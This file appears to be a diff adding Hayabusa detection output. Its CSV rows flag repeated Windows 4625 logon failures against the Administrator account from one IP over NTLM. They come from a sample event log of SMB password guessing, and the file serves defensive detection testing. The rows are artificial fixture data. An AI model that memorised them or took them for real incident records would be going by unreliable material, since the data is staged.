+2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HmFX6MioYqaMumgw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: R4HRWlPWPKy1Cicq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GDUf7wVbHkS9uaPC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eBX0Lviz6Bv5rGcb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zZwPm9qahLU78FRY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jOVsopykTHNQcYUp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n8DY7sdDY8nuWdME  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rTxEVu7mudXEBARZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7ohqvCoOLkFRcqvE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: me8rikVJqcKxvHdq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oLqVmqCmHTrD7V8V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5ySdyzxvDasHgjq0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: N2auwOc1wemq76n1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RgK6lHgC5WOBk4kW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2GG0bKgusKqseQij  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MpHm7DcOmhq4rkaX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OX1vVGrE7fJSMEiZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 65i7wtyAhL58QrzC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k8uSVFRTLTB6g1eg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ire6VOUMWZQnNjES  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pGWnvKUXnbJvRqql  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xBVvrrLf1rnAviKS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NE9atGNBlSLQLLcX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a0M5EaAXziu07hOH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PM1mwxqI7yVgoK2D  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MPqnpvetHXdThxYg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gthbVQMJ7UD2QS7H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AwwJXCoC3gMDoDn7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ilNNoVbZpyhtsNkV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eNY0lv9IglfHP34d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BjSeQciwy17L7raV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wycE1fIsmPq9zaMU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5z1spxImm2ZlGOld  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dg7o4GCET1bJrlEU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E7Db3OLA0XPXL1B4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Uoqx5iPRp2tfYYos  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ixw5XWC2frtrTUkv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3v0NpzAp7io9gbZQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AfOOiR2zO5xem9Tk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yiGtitRqZbGNKrtN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7oQ70LvSMnGxBCFO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JGHr8623vHZyMY5B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: X5Y1C9A4XqxQGoVA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SOnirLGOZzRVSt3y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jLu7XtYCHPqVNE7u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w242Ei1CpWErEE4m  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UOZUagVG4R6zcK92  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7hQOl8XV3Ydp8UcW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u1XBRDfoN0I2iu6L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ngyknhk7uGvs38bG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QXZUhLVsfRUBDcsu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VEDAtkhiSqUcLj2i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: M4CmH02M91kHzeK2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5St1kWrKP4PZlOIy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 17A6k4Om84gunQfB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y9GfR4XdixrNJHny  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 27JWPfEV4DgS1tNv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yNeJnXg1pyedSpqU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WWihv14n9IAQXw2X  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Gy19bFWzQFaQZRBa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: N28Ec4jkXkSNvsQ1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sD9qQWJbeukyPQbc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uoRSHXvwMeKg8cyQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bPEOhloL7vo1fTFQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: glbLglffka5JqQCN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7MTbgvYN6PIaKxeK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tAjWfgmGrm3o2mAx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9EZYPG6uQtsez1UI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PRcnsdLAKd7enemG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OUZEQaUavv7fWk4w  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JKth56VEMqMCgwG9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TCGlvOFFkVpSHSoM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
